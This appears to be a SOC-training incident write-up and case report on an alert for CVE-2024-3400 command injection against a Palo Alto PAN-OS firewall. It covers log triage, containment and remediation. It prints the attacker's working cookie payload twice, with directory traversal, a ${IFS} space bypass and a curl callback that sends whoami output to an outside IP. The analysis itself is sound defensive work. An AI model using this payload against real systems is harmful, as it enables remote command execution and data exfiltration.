Upon examining source IP of 144[.]172[.]79[.]92, we see that it is flagged as malicious.

As the malicious IP is the source and destination is the company private IP, we can identify that this is malicious ingress traffic.

As the cookie looks like this.

SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)`

We can label this as malicious command injection traffic.

As the hostname of the machine is PA-Firewall-01, we can check for any emails for a potential pentesting engagement happening.

We do see that one result is returned upon searching firewall, but the IP address is not relavant to us.

Upon searching the raw logs, we get something back.

Upon examining the logs, we see that the HTTP communication between the server with the malicious IP are all HTTP response code of 200.

The endpoint login.esp specifically has content length of 11364.

As we can see, the one and only login.esp endpoint log is the one where the cookie is modified for command execution, indicating a success exploitation.

We can then contain the compromised host.

We can then add our artifacts like so.

🔐 Security Case Report: Exploitation of CVE-2024-3400 -- PAN-OS Command Injection

📄 Event Summary

A critical command injection vulnerability (CVE-2024-3400) was successfully exploited on a Palo Alto Networks PAN-OS firewall. The attacker leveraged a malicious session cookie to execute remote commands, likely gaining unauthorized access and triggering potential data exfiltration.

🗓️ Event Details

Event ID: 249

Date/Time: April 18, 2024, 03:09 AM

Hostname: PA-Firewall-01

Rule Triggered: SOC274 - Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400)

Alert Level: Security Analyst

Source IP Address: 144.172.79.92

Destination IP Address: 172.16.17.139

HTTP Method: POST

Requested URL: /global-protect/login.esp

HTTP Response Code: 200 OK

Content-Length: 11364

🚨 Exploit Vector

Cookie Value:

SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)

Technique Used:

• Command Injection

• Remote Code Execution

• Directory Traversal

Indicators of Exploitation:

• Malformed SESSID cookie with embedded shell command

• Use of ${IFS} to bypass space filtering restrictions

• Callback to attacker-controlled server (144.172.79.92)

• Execution of whoami command and exfiltration of its result

✅ Outcome

The HTTP request was successfully processed by the device, returning a 200 OK response and a Content-Length of 11364, indicating a full response was sent.

This confirms that the injected command was executed on the device and the attack was successful.

The compromised host accepted the malicious session cookie, processed the shell command, and likely contacted the external server controlled by the attacker.

📌 Additional Context

This exploit leverages a critical vulnerability identified in PAN-OS that allows attackers to inject and execute arbitrary commands via user-controlled input fields such as cookies.

Given that the compromised host responded successfully and returned a large content body, the system was likely not hardened against this attack vector.

🔒 Recommendations

1. Immediately isolate the affected firewall to prevent further compromise.

2. Patch PAN-OS to the latest version that addresses CVE-2024-3400.

3. Review firewall logs for additional signs of unauthorized access or command execution.

4. Block outgoing connections to the attacker's IP address (144.172.79.92).

5. Conduct a full compromise assessment, including memory forensics if possible.

6. Hunt for similar indicators across the environment to detect lateral movement.